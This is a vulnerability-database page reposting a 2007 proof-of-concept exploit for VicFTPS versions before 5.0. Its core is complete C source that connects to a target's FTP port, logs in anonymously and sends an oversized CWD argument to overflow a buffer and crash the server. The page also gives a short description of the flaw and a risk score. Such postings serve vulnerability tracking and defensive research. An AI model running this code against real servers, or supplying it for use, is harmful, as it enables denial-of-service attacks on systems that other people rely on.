Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 16 Views

VicFTPs Server CWD Remote Buffer Overflow Vulnerability. DoS Proof of concept. EIP is overwritten at 323. The POC uses a larger buffer to overwrite exception handler, preventing an error message

Code

                                                /*
VicFTPs Server CWD Remote Buffer Overflow Vulnerability
                 DoS Proof of concept

            r0ut3r (writ3r [at] gmail.com)

Thanks to:
Marsu (Marsupilamipowa [at] hotmail.fr)
for helping me out with this vulnerability.

Greets Marsu, and Timq.

Description:
Sending a long argument to CWD will cause VicFTPs Server
to overwrite memory. EIP is overwritten at 323. The POC
uses a larger buffer to overwrite exception handler,
preventing an error message.  
*/

#include &#60;stdio.h&#62;
#include &#60;string.h&#62;
#include &#60;sys/types.h&#62;
#include &#60;sys/socket.h&#62;
#include &#60;netinet/in.h&#62;

#define PORT 21

int s;
struct sockaddr_in sock_addr;

char recvbuf[1024];
char pwn[450];

int main(int argc, char* argv[])
{
      if (argc &#60; 2) {
        printf(&#34;Usage: %s &#60;ip&#62;\n&#34;, argv[0]);
        return 1; }

      if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) &#60; 0) {
        printf(&#34;error with socket\n&#34;);
        return 1; }

      sock_addr.sin_family = AF_INET;
      sock_addr.sin_addr.s_addr = inet_addr(argv[1]);
      sock_addr.sin_port = htons(PORT);

      if (connect(s, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
        printf(&#34;unable to connect\n&#34;);
        return 1; }

      printf(&#34;[+] Connected\n&#34;);
      memset(recvbuf, &#39;\0&#39;, 1024);
      recv(s, recvbuf, 1024, 0);

      char userbuf[50];
      printf(&#34;[+] Sending user...\n&#34;);
      memset(userbuf, &#39;\0&#39;, 50);
      memcpy(userbuf, &#34;USER anonymous\r\n&#34;, 18);
      if (send(s, userbuf, strlen(userbuf), 0) == -1) {
        printf(&#34;unable to send data\n&#34;);
        return 1; }

      memset(recvbuf, &#39;\0&#39;, 1024);
      recv(s, recvbuf, 1024, 0);

      char passbuf[50];
        printf(&#34;[+] Sending pass...\n&#34;);
        memcpy(passbuf, &#34;PASS anonymous\r\n&#34;, 18);
        if (send(s, passbuf, strlen(passbuf), 0) == -1) {
                printf(&#34;unable to send data\n&#34;);
                return 1; }
      recv(s, recvbuf, 1024, 0);

      printf(&#34;[+] Building payload. \n&#34;);
      memset(pwn, &#39;\0&#39;, 450);
      memcpy(pwn, &#34;CWD &#34;, 4);
      memset(pwn+4, &#39;A&#39;, 400);
      memcpy(pwn+404, &#34;\r\n&#34;, 2);

      printf(&#34;[+] Sending payload.\n&#34;);
      if (send(s, pwn, strlen(pwn), 0) == -1) {
        printf(&#34;unable to send data\n&#34;);
        return 1; }

      printf(&#34;[!] Boom! crashed?!\n&#34;);

      return 0;
}

// milw0rm.com [2007-02-18]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
vicftpsbuffer overflowremotevulnerabilityproof of concepteipexception handlerdospoc.
16